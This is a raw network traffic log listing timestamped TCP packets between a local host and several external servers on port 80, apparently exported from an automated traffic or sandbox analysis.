                                                              Sep 12, 2024 15:06:30.952228069 CEST8049756203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:30.954849958 CEST8049756203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:30.954941034 CEST4975680192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:31.866072893 CEST4975680192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:32.899410963 CEST4975780192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:32.904697895 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:32.905008078 CEST4975780192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:32.996753931 CEST4975780192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:33.002003908 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002017975 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002036095 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002043962 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002052069 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002059937 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002068043 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002203941 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.002230883 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.600950956 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.601397991 CEST8049757203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:33.601630926 CEST4975780192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:34.506875992 CEST4975780192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:35.557827950 CEST4975880192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:35.562953949 CEST8049758203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:35.563101053 CEST4975880192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:35.570231915 CEST4975880192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:35.576900959 CEST8049758203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:36.196917057 CEST8049758203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:36.197787046 CEST8049758203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:36.197853088 CEST4975880192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:36.199809074 CEST4975880192.168.2.4203.161.43.228
                                                              Sep 12, 2024 15:06:36.206242085 CEST8049758203.161.43.228192.168.2.4
                                                              Sep 12, 2024 15:06:41.483519077 CEST4975980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:41.488660097 CEST80497593.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:41.488886118 CEST4975980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:41.497684002 CEST4975980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:41.502890110 CEST80497593.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:43.007045031 CEST4975980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:43.013887882 CEST80497593.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:43.013998985 CEST4975980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:44.026134968 CEST4976080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:44.031508923 CEST80497603.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:44.031593084 CEST4976080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:44.043433905 CEST4976080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:44.048696995 CEST80497603.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:44.485788107 CEST80497603.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:44.485858917 CEST4976080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:45.553591013 CEST4976080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:45.558789968 CEST80497603.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.573417902 CEST4976180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:46.578778028 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.578850985 CEST4976180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:46.591907978 CEST4976180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:46.596898079 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.596959114 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.596987963 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.597014904 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.597044945 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.597177982 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.597208023 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.597321033 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:46.597347975 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:47.033839941 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:47.036755085 CEST4976180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:48.100488901 CEST4976180192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:48.105520964 CEST80497613.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:49.120745897 CEST4976280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:49.125941992 CEST80497623.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:49.128792048 CEST4976280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:49.136720896 CEST4976280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:49.141731977 CEST80497623.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:49.589215040 CEST80497623.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:49.589678049 CEST80497623.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:49.594347954 CEST4976280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:49.594348907 CEST4976280192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:06:49.599298954 CEST80497623.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:06:54.639322042 CEST4976380192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:54.644344091 CEST8049763185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:54.644431114 CEST4976380192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:54.656380892 CEST4976380192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:54.661299944 CEST8049763185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:55.290832043 CEST8049763185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:55.290935993 CEST8049763185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:55.290949106 CEST8049763185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:55.291038990 CEST4976380192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:56.163054943 CEST4976380192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:57.184756041 CEST4976480192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:57.190061092 CEST8049764185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:57.190253019 CEST4976480192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:57.204737902 CEST4976480192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:57.210239887 CEST8049764185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:57.637331963 CEST8049764185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:57.638134003 CEST8049764185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:57.638303995 CEST4976480192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:58.712753057 CEST4976480192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:59.728809118 CEST4976580192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:59.739875078 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.740281105 CEST4976580192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:59.751956940 CEST4976580192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:06:59.757107019 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757152081 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757179022 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757205009 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757236958 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757591963 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757618904 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757673979 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:06:59.757702112 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:00.195352077 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:00.202491045 CEST8049765185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:00.202553988 CEST4976580192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:01.256851912 CEST4976580192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:02.275281906 CEST4976680192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:02.280498028 CEST8049766185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:02.280571938 CEST4976680192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:02.288429022 CEST4976680192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:02.293375015 CEST8049766185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:02.760704041 CEST8049766185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:02.760962009 CEST8049766185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:02.761171103 CEST4976680192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:02.767030954 CEST4976680192.168.2.4185.199.108.153
                                                              Sep 12, 2024 15:07:02.772057056 CEST8049766185.199.108.153192.168.2.4
                                                              Sep 12, 2024 15:07:18.328285933 CEST4976780192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:18.333364010 CEST804976791.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:18.333456039 CEST4976780192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:18.346549988 CEST4976780192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:18.352078915 CEST804976791.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:18.982920885 CEST804976791.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:18.983098984 CEST804976791.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:18.984870911 CEST4976780192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:19.932545900 CEST4976780192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:20.947710991 CEST4976880192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:20.952877045 CEST804976891.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:20.953211069 CEST4976880192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:20.965218067 CEST4976880192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:20.970757008 CEST804976891.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:21.647376060 CEST804976891.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:21.647412062 CEST804976891.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:21.647424936 CEST804976891.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:21.647591114 CEST4976880192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:22.475610971 CEST4976880192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:23.496038914 CEST4976980192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:23.501050949 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:23.504962921 CEST4976980192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:23.516911030 CEST4976980192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:23.522069931 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:23.522080898 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:23.522084951 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:23.522197008 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:23.522205114 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:23.522213936 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:23.522222996 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:23.522337914 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:23.522346973 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:24.253087044 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:24.253412008 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:24.253463984 CEST4976980192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:25.023363113 CEST4976980192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:26.045140028 CEST4977080192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:26.050183058 CEST804977091.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:26.050262928 CEST4977080192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:26.061320066 CEST4977080192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:26.073472977 CEST804977091.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:26.675591946 CEST804977091.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:26.677113056 CEST804977091.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:26.677164078 CEST4977080192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:26.678796053 CEST4977080192.168.2.491.184.0.200
                                                              Sep 12, 2024 15:07:26.683969975 CEST804977091.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:31.885998011 CEST4977180192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:31.890964031 CEST8049771154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:31.891062021 CEST4977180192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:31.903901100 CEST4977180192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:31.909025908 CEST8049771154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:32.865859985 CEST8049771154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:32.866378069 CEST8049771154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:32.867571115 CEST8049771154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:32.867660999 CEST8049771154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:32.867698908 CEST4977180192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:32.868273973 CEST8049771154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:32.868330956 CEST8049771154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:32.868438959 CEST4977180192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:32.870918036 CEST8049771154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:32.871012926 CEST8049771154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:32.875510931 CEST4977180192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:33.415378094 CEST4977180192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:34.433384895 CEST4977280192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:34.438549995 CEST8049772154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:34.438633919 CEST4977280192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:34.452281952 CEST4977280192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:34.457145929 CEST8049772154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:35.362529039 CEST8049772154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:35.362653971 CEST8049772154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:35.362670898 CEST8049772154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:35.362762928 CEST4977280192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:35.362766027 CEST8049772154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:35.362782001 CEST8049772154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:35.362818003 CEST4977280192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:35.362919092 CEST8049772154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:35.363060951 CEST8049772154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:35.368884087 CEST4977280192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:35.960186005 CEST4977280192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:36.980815887 CEST4977380192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:36.985795975 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:36.993082047 CEST4977380192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:37.000893116 CEST4977380192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:37.005870104 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:37.005930901 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:37.005963087 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:37.005990028 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:37.006037951 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:37.006067038 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:37.006093979 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:37.006123066 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:37.006150007 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.182912111 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.183017015 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.183051109 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.183068037 CEST4977380192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:38.183106899 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.183141947 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.183149099 CEST4977380192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:38.183177948 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.183208942 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.183226109 CEST4977380192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:38.183243036 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.183278084 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.183289051 CEST4977380192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:38.183307886 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.183351040 CEST4977380192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:38.188293934 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.188605070 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.188654900 CEST4977380192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:38.188764095 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.188807011 CEST8049773154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:38.188859940 CEST4977380192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:38.507121086 CEST4977380192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:39.526729107 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:39.531830072 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:39.531985044 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:39.542717934 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:39.547890902 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.502587080 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.502619982 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.502634048 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.502650023 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.502665997 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.502676964 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:40.502681017 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.502705097 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.502718925 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.502733946 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.502748966 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.502774000 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:40.502795935 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:40.507617950 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.507636070 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.507653952 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.507692099 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:40.507761955 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.507817030 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:40.741565943 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.741590977 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.741616964 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.741631031 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.741703033 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:40.741729975 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:40.741738081 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.741782904 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.741822958 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:40.742475986 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.742506027 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.742547989 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:40.742551088 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.742909908 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.742945910 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:40.743324995 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:40.743374109 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:40.747411966 CEST4977480192.168.2.4154.23.176.197
                                                              Sep 12, 2024 15:07:40.752427101 CEST8049774154.23.176.197192.168.2.4
                                                              Sep 12, 2024 15:07:46.244471073 CEST4977580192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:46.249505043 CEST804977545.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:46.249581099 CEST4977580192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:46.266565084 CEST4977580192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:46.272150993 CEST804977545.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:47.151875019 CEST804977545.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:47.152153969 CEST804977545.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:47.152302027 CEST4977580192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:47.772619963 CEST4977580192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:48.791341066 CEST4977680192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:48.796396017 CEST804977645.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:48.796485901 CEST4977680192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:48.807373047 CEST4977680192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:48.813611984 CEST804977645.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:49.683084011 CEST804977645.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:49.683542967 CEST804977645.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:49.683728933 CEST4977680192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:50.319341898 CEST4977680192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:51.339425087 CEST4977780192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:51.344257116 CEST804977745.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:51.344541073 CEST4977780192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:51.355828047 CEST4977780192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:51.361035109 CEST804977745.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:51.361068964 CEST804977745.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:51.361103058 CEST804977745.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:51.361131907 CEST804977745.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:51.361159086 CEST804977745.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:51.361382008 CEST804977745.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:51.361411095 CEST804977745.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:51.361442089 CEST804977745.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:51.361596107 CEST804977745.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:52.206064939 CEST804977745.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:52.206273079 CEST804977745.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:52.206346989 CEST4977780192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:52.866245985 CEST4977780192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:53.885459900 CEST4977880192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:54.637150049 CEST804977845.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:54.637274027 CEST4977880192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:54.644417048 CEST4977880192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:54.650527954 CEST804977845.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:55.525688887 CEST804977845.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:55.525878906 CEST804977845.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:07:55.526268005 CEST4977880192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:55.529086113 CEST4977880192.168.2.445.113.201.77
                                                              Sep 12, 2024 15:07:55.534775972 CEST804977845.113.201.77192.168.2.4
                                                              Sep 12, 2024 15:08:00.582412004 CEST4977980192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:00.590302944 CEST804977976.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:00.590373993 CEST4977980192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:00.604260921 CEST4977980192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:00.609230042 CEST804977976.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:01.062894106 CEST804977976.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:01.063349009 CEST804977976.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:01.064027071 CEST4977980192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:02.116385937 CEST4977980192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:03.136954069 CEST4978080192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:03.142075062 CEST804978076.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:03.142553091 CEST4978080192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:03.156893015 CEST4978080192.168.2.476.223.113.161
